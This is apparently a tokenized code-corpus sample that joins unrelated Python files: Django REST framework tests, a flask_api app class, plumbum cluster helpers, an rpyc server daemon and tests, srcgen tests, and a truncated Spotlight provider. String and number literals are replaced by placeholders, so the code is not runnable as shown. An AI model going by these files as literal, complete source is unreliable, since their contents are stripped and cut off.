<EOL> return field_repr ( serializer ) </s>
<s> from django . conf . urls import url <EOL> from django . contrib . auth . models import User <EOL> from rest_framework . authentication import TokenAuthentication <EOL> from rest_framework . authtoken . models import Token <EOL> from rest_framework . test import APITestCase <EOL> from rest_framework . views import APIView <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , APIView . as_view ( authentication_classes = ( TokenAuthentication , ) ) ) , <EOL> ] <EOL> class MyMiddleware ( object ) : <EOL> def process_response ( self , request , response ) : <EOL> assert hasattr ( request , '<STR_LIT:user>' ) , '<STR_LIT>' <EOL> assert request . user . is_authenticated ( ) , '<STR_LIT>' <EOL> return response <EOL> class TestMiddleware ( APITestCase ) : <EOL> urls = '<STR_LIT>' <EOL> def test_middleware_can_access_user_when_processing_response ( self ) : <EOL> user = User . objects . create_user ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> key = '<STR_LIT>' <EOL> Token . objects . create ( key = key , user = user ) <EOL> with self . settings ( <EOL> MIDDLEWARE_CLASSES = ( '<STR_LIT>' , ) <EOL> ) : <EOL> auth = '<STR_LIT>' + key <EOL> self . client . get ( '<STR_LIT:/>' , HTTP_AUTHORIZATION = auth ) </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from django . core . validators import MaxValueValidator , RegexValidator <EOL> from django . db import models <EOL> from django . test import TestCase <EOL> from rest_framework import generics , serializers , status <EOL> from rest_framework . test import APIRequestFactory <EOL> factory = APIRequestFactory ( ) <EOL> class ValidationModel ( models . Model ) : <EOL> blank_validated_field = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class ValidationModelSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = ValidationModel <EOL> fields = ( '<STR_LIT>' , ) <EOL> read_only_fields = ( '<STR_LIT>' , ) <EOL> class UpdateValidationModel ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> queryset = ValidationModel . objects . all ( ) <EOL> serializer_class = ValidationModelSerializer <EOL> class ShouldValidateModel ( models . Model ) : <EOL> should_validate_field = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class ShouldValidateModelSerializer ( serializers . ModelSerializer ) : <EOL> renamed = serializers . CharField ( source = '<STR_LIT>' , required = False ) <EOL> def validate_renamed ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value <EOL> class Meta : <EOL> model = ShouldValidateModel <EOL> fields = ( '<STR_LIT>' , ) <EOL> class TestNestedValidationError ( TestCase ) : <EOL> def test_nested_validation_error_detail ( self ) : <EOL> """<STR_LIT>""" <EOL> e = serializers . ValidationError ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:error>' ] , <EOL> } <EOL> } ) <EOL> self . assertEqual ( serializers . get_validation_error_detail ( e ) , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:error>' ] , <EOL> } <EOL> } ) <EOL> class TestPreSaveValidationExclusionsSerializer ( TestCase ) : <EOL> def test_renamed_fields_are_model_validated ( self ) : <EOL> """<STR_LIT>""" <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( serializer . is_valid ( ) , False ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> self . assertNotIn ( '<STR_LIT>' , serializer . errors ) <EOL> class TestCustomValidationMethods ( TestCase ) : <EOL> def test_custom_validation_method_is_executed ( self ) : <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> def test_custom_validation_method_passing ( self ) : <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> class ValidationSerializer ( serializers . Serializer ) : <EOL> foo = serializers . CharField ( ) <EOL> def validate_foo ( self , attrs , source ) : <EOL> raise serializers . ValidationError ( "<STR_LIT>" ) <EOL> def validate ( self , attrs ) : <EOL> raise serializers . ValidationError ( "<STR_LIT>" ) <EOL> class TestAvoidValidation ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_serializer_errors_has_only_invalid_data_error ( self ) : <EOL> serializer = ValidationSerializer ( data = '<STR_LIT>' ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertDictEqual ( serializer . errors , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' % type ( '<STR_LIT>' ) . __name__ <EOL> ] <EOL> } ) <EOL> class ValidationMaxValueValidatorModel ( models . Model ) : <EOL> number_value = models . PositiveIntegerField ( validators = [ MaxValueValidator ( <NUM_LIT:100> ) ] ) <EOL> class ValidationMaxValueValidatorModelSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = ValidationMaxValueValidatorModel <EOL> class UpdateMaxValueValidationModel ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> queryset = ValidationMaxValueValidatorModel . objects . all ( ) <EOL> serializer_class = ValidationMaxValueValidatorModelSerializer <EOL> class TestMaxValueValidatorValidation ( TestCase ) : <EOL> def test_max_value_validation_serializer_success ( self ) : <EOL> serializer = ValidationMaxValueValidatorModelSerializer ( data = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> def test_max_value_validation_serializer_fails ( self ) : <EOL> serializer = ValidationMaxValueValidatorModelSerializer ( data = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertDictEqual ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , serializer . errors ) <EOL> def test_max_value_validation_success ( self ) : <EOL> obj = ValidationMaxValueValidatorModel . objects . create ( number_value = <NUM_LIT:100> ) <EOL> request = factory . patch ( '<STR_LIT>' . format ( obj . pk ) , { '<STR_LIT>' : <NUM_LIT> } , format = '<STR_LIT>' ) <EOL> view = UpdateMaxValueValidationModel ( ) . as_view ( ) <EOL> response = view ( request , pk = obj . pk ) . render ( ) <EOL> self . assertEqual ( response . status_code , status . HTTP_200_OK ) <EOL> def test_max_value_validation_fail ( self ) : <EOL> obj = ValidationMaxValueValidatorModel . objects . create ( number_value = <NUM_LIT:100> ) <EOL> request = factory . patch ( '<STR_LIT>' . format ( obj . pk ) , { '<STR_LIT>' : <NUM_LIT> } , format = '<STR_LIT>' ) <EOL> view = UpdateMaxValueValidationModel ( ) . as_view ( ) <EOL> response = view ( request , pk = obj . pk ) . render ( ) <EOL> self . assertEqual ( response . content , b'<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , status . HTTP_400_BAD_REQUEST ) <EOL> class TestChoiceFieldChoicesValidate ( TestCase ) : <EOL> CHOICES = [ <EOL> ( <NUM_LIT:0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ] <EOL> SINGLE_CHOICES = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> CHOICES_NESTED = [ <EOL> ( '<STR_LIT>' , ( <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ) ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) , <EOL> ] <EOL> MIXED_CHOICES = [ <EOL> ( '<STR_LIT>' , ( <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ) ) , <EOL> <NUM_LIT:3> , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) , <EOL> ] <EOL> def test_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . CHOICES ) <EOL> value = self . CHOICES [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_single_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . SINGLE_CHOICES ) <EOL> value = self . SINGLE_CHOICES [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_nested_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . CHOICES_NESTED ) <EOL> value = self . CHOICES_NESTED [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_mixed_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . MIXED_CHOICES ) <EOL> value = self . MIXED_CHOICES [ <NUM_LIT:1> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> class RegexSerializer ( serializers . Serializer ) : <EOL> pin = serializers . CharField ( <EOL> validators = [ RegexValidator ( regex = re . compile ( '<STR_LIT>' ) , <EOL> message = '<STR_LIT>' ) ] ) <EOL> expected_repr = """<STR_LIT>""" . strip ( ) <EOL> class TestRegexSerializer ( TestCase ) : <EOL> def test_regex_repr ( self ) : <EOL> serializer_repr = repr ( RegexSerializer ( ) ) <EOL> assert serializer_repr == expected_repr </s>
<s> from __future__ import unicode_literals <EOL> from flask import request , Flask , Blueprint <EOL> from flask . _compat import reraise , string_types , text_type <EOL> from flask_api . exceptions import APIException <EOL> from flask_api . request import APIRequest <EOL> from flask_api . response import APIResponse <EOL> from flask_api . settings import APISettings <EOL> from itertools import chain <EOL> from werkzeug . exceptions import HTTPException <EOL> import re <EOL> import sys <EOL> api_resources = Blueprint ( <EOL> '<STR_LIT>' , __name__ , <EOL> url_prefix = '<STR_LIT>' , <EOL> template_folder = '<STR_LIT>' , static_folder = '<STR_LIT>' <EOL> ) <EOL> def urlize_quoted_links ( content ) : <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , content ) <EOL> class FlaskAPI ( Flask ) : <EOL> request_class = APIRequest <EOL> response_class = APIResponse <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FlaskAPI , self ) . __init__ ( * args , ** kwargs ) <EOL> self . api_settings = APISettings ( self . config ) <EOL> self . register_blueprint ( api_resources ) <EOL> self . jinja_env . filters [ '<STR_LIT>' ] = urlize_quoted_links <EOL> def preprocess_request ( self ) : <EOL> request . parser_classes = self . api_settings . DEFAULT_PARSERS <EOL> request . renderer_classes = self . api_settings . DEFAULT_RENDERERS <EOL> return super ( FlaskAPI , self ) . preprocess_request ( ) <EOL> def make_response ( self , rv ) : <EOL> """<STR_LIT>""" <EOL> status_or_headers = headers = None <EOL> if isinstance ( rv , tuple ) : <EOL> rv , status_or_headers , headers = rv + ( None , ) * ( <NUM_LIT:3> - len ( rv ) ) <EOL> if rv is None and status_or_headers : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if isinstance ( status_or_headers , ( dict , list ) ) : <EOL> headers , status_or_headers = status_or_headers , None <EOL> if not isinstance ( rv , self . response_class ) : <EOL> if isinstance ( rv , ( text_type , bytes , bytearray , list , dict ) ) : <EOL> rv = self . response_class ( rv , headers = headers , status = status_or_headers ) <EOL> headers = status_or_headers = None <EOL> else : <EOL> rv = self . response_class . force_type ( rv , request . environ ) <EOL> if status_or_headers is not None : <EOL> if isinstance ( status_or_headers , string_types ) : <EOL> rv . status = status_or_headers <EOL> else : <EOL> rv . status_code = status_or_headers <EOL> if headers : <EOL> rv . headers . extend ( headers ) <EOL> return rv <EOL> def handle_user_exception ( self , e ) : <EOL> """<STR_LIT>""" <EOL> exc_type , exc_value , tb = sys . exc_info ( ) <EOL> assert exc_value is e <EOL> if isinstance ( e , HTTPException ) and not self . trap_http_exception ( e ) : <EOL> return self . handle_http_exception ( e ) <EOL> if isinstance ( e , APIException ) : <EOL> return self . handle_api_exception ( e ) <EOL> blueprint_handlers = ( ) <EOL> handlers = self . error_handler_spec . get ( request . blueprint ) <EOL> if handlers is not None : <EOL> blueprint_handlers = handlers . get ( None , ( ) ) <EOL> app_handlers = self . error_handler_spec [ None ] . get ( None , ( ) ) <EOL> for typecheck , handler in chain ( blueprint_handlers , app_handlers ) : <EOL> if isinstance ( e , typecheck ) : <EOL> return handler ( e ) <EOL> reraise ( exc_type , exc_value , tb ) <EOL> def handle_api_exception ( self , exc ) : <EOL> return APIResponse ( { '<STR_LIT:message>' : exc . detail } , status = exc . status_code ) <EOL> def create_url_adapter ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request is not None : <EOL> environ = request . environ . copy ( ) <EOL> environ [ '<STR_LIT>' ] = request . method <EOL> return self . url_map . bind_to_environ ( environ , <EOL> server_name = self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] is not None : <EOL> return self . url_map . bind ( <EOL> self . config [ '<STR_LIT>' ] , <EOL> script_name = self . config [ '<STR_LIT>' ] or '<STR_LIT:/>' , <EOL> url_scheme = self . config [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> WARN_ONLY = True <EOL> message = """<STR_LIT>""" <EOL> class DeprecatedPropertyError ( Exception ) : <EOL> pass <EOL> class DeprecatedProperty ( object ) : <EOL> def __init__ ( self , instance , method ) : <EOL> self . instance = instance <EOL> self . method = method <EOL> def call ( self ) : <EOL> return self . method ( self . instance ) <EOL> def call_and_notify ( self ) : <EOL> method = self . method <EOL> method_name = method . __name__ <EOL> if WARN_ONLY : <EOL> warnings . warn ( message % method_name ) <EOL> return self . call ( ) <EOL> else : <EOL> raise DeprecatedPropertyError ( message % method_name ) <EOL> def __call__ ( self ) : <EOL> return self . call ( ) <EOL> def __nonzero__ ( self ) : <EOL> value = self . call_and_notify ( ) <EOL> return bool ( value ) <EOL> def __bool__ ( self ) : <EOL> return self . __nonzero__ ( ) <EOL> def __eq__ ( self , other ) : <EOL> value = self . call_and_notify ( ) <EOL> return value == other <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class DeprecatedPropertyDescriptor ( object ) : <EOL> def __init__ ( self , method ) : <EOL> self . method = method <EOL> def __get__ ( self , instance , owner ) : <EOL> return DeprecatedProperty ( instance , self . method ) <EOL> deprecated_property = DeprecatedPropertyDescriptor </s>
<s> from plumbum . commands . base import BaseCommand <EOL> from plumbum . commands . processes import run_proc , CommandNotFound , ProcessExecutionError <EOL> def make_concurrent ( self , rhs ) : <EOL> if not isinstance ( rhs , BaseCommand ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if isinstance ( self , ConcurrentCommand ) : <EOL> if isinstance ( rhs , ConcurrentCommand ) : <EOL> self . commands . extend ( rhs . commands ) <EOL> else : <EOL> self . commands . append ( rhs ) <EOL> return self <EOL> elif isinstance ( rhs , ConcurrentCommand ) : <EOL> rhs . commands . insert ( <NUM_LIT:0> , self ) <EOL> return rhs <EOL> else : <EOL> return ConcurrentCommand ( self , rhs ) <EOL> BaseCommand . __and__ = make_concurrent <EOL> class ConcurrentPopen ( object ) : <EOL> def __init__ ( self , procs ) : <EOL> self . procs = procs <EOL> self . stdin = None <EOL> self . stdout = None <EOL> self . stderr = None <EOL> self . encoding = None <EOL> self . returncode = None <EOL> @ property <EOL> def argv ( self ) : <EOL> return [ getattr ( proc , "<STR_LIT>" , [ ] ) for proc in self . procs ] <EOL> def poll ( self ) : <EOL> if self . returncode is not None : <EOL> return self . returncode <EOL> rcs = [ proc . poll ( ) for proc in self . procs ] <EOL> if any ( rc is None for rc in rcs ) : <EOL> return None <EOL> self . returncode = <NUM_LIT:0> <EOL> for rc in rcs : <EOL> if rc != <NUM_LIT:0> : <EOL> self . returncode = rc <EOL> break <EOL> return self . returncode <EOL> def wait ( self ) : <EOL> for proc in self . procs : <EOL> proc . wait ( ) <EOL> return self . poll ( ) <EOL> def communicate ( self , input = None ) : <EOL> if input : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> out_err_tuples = [ proc . communicate ( ) for proc in self . procs ] <EOL> self . wait ( ) <EOL> return tuple ( zip ( * out_err_tuples ) ) <EOL> class ConcurrentCommand ( BaseCommand ) : <EOL> def __init__ ( self , * commands ) : <EOL> self . commands = list ( commands ) <EOL> def formulate ( self , level = <NUM_LIT:0> , args = ( ) ) : <EOL> form = [ "<STR_LIT:(>" ] <EOL> for cmd in self . commands : <EOL> form . extend ( cmd . formulate ( level , args ) ) <EOL> form . append ( "<STR_LIT:&>" ) <EOL> return form + [ "<STR_LIT:)>" ] <EOL> def popen ( self , * args , ** kwargs ) : <EOL> return ConcurrentPopen ( [ cmd [ args ] . popen ( ** kwargs ) for cmd in self . commands ] ) <EOL> def __getitem__ ( self , args ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( args , ( tuple , list ) ) : <EOL> args = [ args , ] <EOL> if not args : <EOL> return self <EOL> else : <EOL> return ConcurrentCommand ( * ( cmd [ args ] for cmd in self . commands ) ) <EOL> class Cluster ( object ) : <EOL> def __init__ ( self , * machines ) : <EOL> self . machines = list ( machines ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , t , v , tb ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> for mach in self . machines : <EOL> mach . close ( ) <EOL> del self . machines [ : ] <EOL> def add_machine ( self , machine ) : <EOL> self . machines . append ( machine ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . machines ) <EOL> def filter ( self , pred ) : <EOL> return self . __class__ ( filter ( pred , self ) ) <EOL> def which ( self , progname ) : <EOL> return [ mach . which ( progname ) for mach in self ] <EOL> def list_processes ( self ) : <EOL> return [ mach . list_processes ( ) for mach in self ] <EOL> def pgrep ( self , pattern ) : <EOL> return [ mach . pgrep ( pattern ) for mach in self ] <EOL> def path ( self , * parts ) : <EOL> return [ mach . path ( * parts ) for mach in self ] <EOL> def __getitem__ ( self , progname ) : <EOL> if not isinstance ( progname , str ) : <EOL> raise TypeError ( "<STR_LIT>" % ( type ( progname , ) ) ) <EOL> return ConcurrentCommand ( * ( mach [ progname ] for mach in self ) ) <EOL> def __contains__ ( self , cmd ) : <EOL> try : <EOL> self [ cmd ] <EOL> except CommandNotFound : <EOL> return False <EOL> else : <EOL> return True <EOL> @ property <EOL> def python ( self ) : <EOL> return ConcurrentCommand ( * ( mach . python for mach in self ) ) <EOL> def session ( self ) : <EOL> return ClusterSession ( * ( mach . session ( ) for mach in self ) ) <EOL> class ClusterSession ( object ) : <EOL> def __init__ ( self , * sessions ) : <EOL> self . sessions = sessions <EOL> def __iter__ ( self ) : <EOL> return iter ( self . sessions ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , t , v , tb ) : <EOL> self . close ( ) <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . close ( ) <EOL> except Exception : <EOL> pass <EOL> def alive ( self ) : <EOL> """<STR_LIT>""" <EOL> return all ( session . alive for session in self ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> for session in self . sessions : <EOL> session . close ( ) <EOL> del self . sessions [ : ] <EOL> def popen ( self , cmd ) : <EOL> return ConcurrentPopen ( [ session . popen ( cmd ) for session in self ] ) <EOL> def run ( self , cmd , retcode = None ) : <EOL> return run_proc ( self . popen ( cmd ) , retcode ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from plumbum import local <EOL> from plumbum . cmd import ls , date , sleep <EOL> c = ls & date & sleep [ <NUM_LIT:1> ] <EOL> print ( c ( ) ) <EOL> c = ls & date & sleep [ <NUM_LIT:1> ] & sleep [ "<STR_LIT>" ] <EOL> try : <EOL> c ( ) <EOL> except ProcessExecutionError as ex : <EOL> print ( ex ) <EOL> else : <EOL> assert False <EOL> clst = Cluster ( local , local , local ) <EOL> print ( clst [ "<STR_LIT>" ] ( ) ) <EOL> print ( local . session ( ) . run ( "<STR_LIT>" ) ) <EOL> ret , stdout , stderr = clst . session ( ) . run ( "<STR_LIT>" ) <EOL> print ( ret ) <EOL> ret = [ int ( pid ) for pid in stdout ] <EOL> assert ( len ( set ( ret ) ) == <NUM_LIT:3> ) </s>
<s> from plumbum . commands . processes import CommandNotFound <EOL> from plumbum . commands . processes import ProcessExecutionError <EOL> from plumbum . commands . processes import ProcessTimedOut <EOL> class PopenAddons ( object ) : <EOL> """<STR_LIT>""" <EOL> def verify ( self , retcode , timeout , stdout , stderr ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( self , "<STR_LIT>" , False ) : <EOL> raise ProcessTimedOut ( "<STR_LIT>" % ( timeout , ) , <EOL> getattr ( self , "<STR_LIT>" , None ) ) <EOL> if retcode is not None : <EOL> if hasattr ( retcode , "<STR_LIT>" ) : <EOL> if self . returncode not in retcode : <EOL> raise ProcessExecutionError ( getattr ( self , "<STR_LIT>" , None ) , self . returncode , <EOL> stdout , stderr ) <EOL> elif self . returncode != retcode : <EOL> raise ProcessExecutionError ( getattr ( self , "<STR_LIT>" , None ) , self . returncode , <EOL> stdout , stderr ) <EOL> class BaseMachine ( object ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , cmd , * othercommands ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> command = self [ cmd ] <EOL> if not command . executable . exists ( ) : <EOL> raise CommandNotFound ( cmd , command . executable ) <EOL> else : <EOL> return command <EOL> except CommandNotFound : <EOL> if othercommands : <EOL> return self . get ( othercommands [ <NUM_LIT:0> ] , * othercommands [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> raise <EOL> def __contains__ ( self , cmd ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self [ cmd ] <EOL> except CommandNotFound : <EOL> return False <EOL> else : <EOL> return True <EOL> def daemonic_popen ( self , command , cwd = "<STR_LIT:/>" , stdout = None , stderr = None , append = True ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) </s>
<s> from __future__ import with_statement <EOL> import daemon <EOL> import lockfile <EOL> import sys <EOL> import signal <EOL> from rpyc . utils . server import ThreadedServer , ForkingServer <EOL> from rpyc . core . service import SlaveService <EOL> from rpyc . lib import setup_logger <EOL> try : <EOL> from configparser import ConfigParser <EOL> except ImportError : <EOL> from ConfigParser import ConfigParser <EOL> server = None <EOL> def start ( ) : <EOL> global server <EOL> conf = ConfigParser ( ) <EOL> conf . read ( '<STR_LIT>' ) <EOL> mode = conf . get ( "<STR_LIT>" , "<STR_LIT>" ) . lower ( ) <EOL> if mode == "<STR_LIT>" : <EOL> factory = ThreadedServer <EOL> elif mode == "<STR_LIT>" : <EOL> factory = ForkingServer <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( mode , ) ) <EOL> setup_logger ( conf . getboolean ( "<STR_LIT>" , "<STR_LIT>" ) , conf . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> server = factory ( SlaveService , hostname = conf . get ( "<STR_LIT>" , "<STR_LIT:host>" ) , <EOL> port = conf . getint ( "<STR_LIT>" , "<STR_LIT:port>" ) , reuse_addr = True ) <EOL> server . start ( ) <EOL> def reload ( * args ) : <EOL> server . close ( ) <EOL> start ( ) <EOL> def stop ( * args ) : <EOL> server . close ( ) <EOL> sys . exit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> with daemon . DaemonContext ( <EOL> pidfile = lockfile . FileLock ( '<STR_LIT>' ) , <EOL> signal_map = { signal . SIGTERM : stop , signal . SIGHUP : reload } ) : <EOL> start ( ) </s>
<s> """<STR_LIT>""" <EOL> from rpyc . core import ( SocketStream , TunneledSocketStream , PipeStream , Channel , <EOL> Connection , Service , BaseNetref , AsyncResult , GenericException , <EOL> AsyncResultTimeout , VoidService , SlaveService ) <EOL> from rpyc . utils . factory import ( connect_stream , connect_channel , connect_pipes , <EOL> connect_stdpipes , connect , ssl_connect , discover , connect_by_service , connect_subproc , <EOL> connect_thread , ssh_connect ) <EOL> from rpyc . utils . helpers import async , timed , buffiter , BgServingThread , restricted <EOL> from rpyc . utils import classic <EOL> from rpyc . version import version as __version__ <EOL> __author__ = "<STR_LIT>" </s>
<s> import rpyc <EOL> import unittest <EOL> class Properties ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _x = <NUM_LIT:0> <EOL> @ property <EOL> def counter ( self ) : <EOL> self . _x += <NUM_LIT:1> <EOL> return self . _x <EOL> @ property <EOL> def dont_touch_me ( self ) : <EOL> <NUM_LIT:1> / <NUM_LIT:0> <EOL> class TestAttributes ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . conn = rpyc . classic . connect_thread ( ) <EOL> def tearDown ( self ) : <EOL> self . conn . close ( ) <EOL> def test_properties ( self ) : <EOL> p = self . conn . modules [ "<STR_LIT>" ] . Properties ( ) <EOL> print ( p . counter ) <EOL> print ( p . counter ) <EOL> print ( p . counter ) <EOL> self . assertEqual ( p . counter , <NUM_LIT:4> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import with_statement <EOL> import unittest <EOL> from srcgen . python import PythonModule , R , E , CythonModule <EOL> class TestPython ( unittest . TestCase ) : <EOL> def test ( self ) : <EOL> m = PythonModule ( ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . sep ( ) <EOL> m . comment ( "<STR_LIT>" , box = True ) <EOL> m . stmt ( R ( x = <NUM_LIT> ) ) <EOL> with m . if_ ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . if_ ( E ( "<STR_LIT:z>" ) == <NUM_LIT> ) : <EOL> m . comment ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . if_ ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . sep ( ) <EOL> with m . def_ ( "<STR_LIT:foo>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> with m . def_ ( "<STR_LIT:bar>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> def gen_class ( self , m , name , * args ) : <EOL> with m . class_ ( name ) : <EOL> with m . method ( "<STR_LIT>" , * args ) : <EOL> for a in args : <EOL> m . stmt ( "<STR_LIT>" , a ) <EOL> def test_methods ( self ) : <EOL> m = PythonModule ( ) <EOL> self . gen_class ( m , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" ) <EOL> self . gen_class ( m , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> def test_cython ( self ) : <EOL> m = CythonModule ( ) <EOL> with m . def_ ( "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT:b>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . cdef ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . cdef . class_ ( "<STR_LIT>" ) : <EOL> with m . method ( "<STR_LIT>" , "<STR_LIT:x>" ) : <EOL> m . return_ ( "<STR_LIT>" ) <EOL> with m . cdef . extern ( "<STR_LIT>" ) : <EOL> with m . struct ( "<STR_LIT>" ) : <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> m . stmt ( "<STR_LIT>" ) <EOL> output = """<STR_LIT>""" <EOL> self . assertEqual ( str ( m ) , output ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from Provider import * <EOL> from urllib import quote <EOL> from Utilities import * <EOL> import time <EOL> import Cache <EOL> class SpotlightAtom ( ProviderAtom ) : <EOL> def __init__ ( self , provider , url ) : <EOL> ProviderAtom . __init__ ( self , provider , url ) <EOL> clue = self . provider . clue <EOL> self . results = None <EOL> if clue . emails ( ) : <EOL> if url == '<STR_LIT>' : <EOL> predicate = "<STR_LIT>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % ( m , m ) for m in clue . emails ( ) ] ) + "<STR_LIT:)>" <EOL> else : <EOL> exclusions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> predicate = "<STR_LIT:(>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % e for e in exclusions ] ) + "<STR_LIT>" + '<STR_LIT>' . join ( [ "<STR_LIT>" % m for m in clue . emails ( ) ] ) + '<STR_LIT:)>' <EOL> self . proxy = queryProxy . alloc ( ) . init ( ) <EOL> setattr ( self . proxy , '<STR_LIT>' , self ) <EOL> setattr ( self . proxy , '<STR_LIT>' , predicate ) <EOL> self . proxy . start ( ) <EOL> def sortOrder ( self ) : <EOL> return MAX_SORT_ORDER - <NUM_LIT:1> <EOL> def body ( self ) : <EOL> if not self . results : return None <EOL> body = [ ] <EOL> for r in self . results [ : 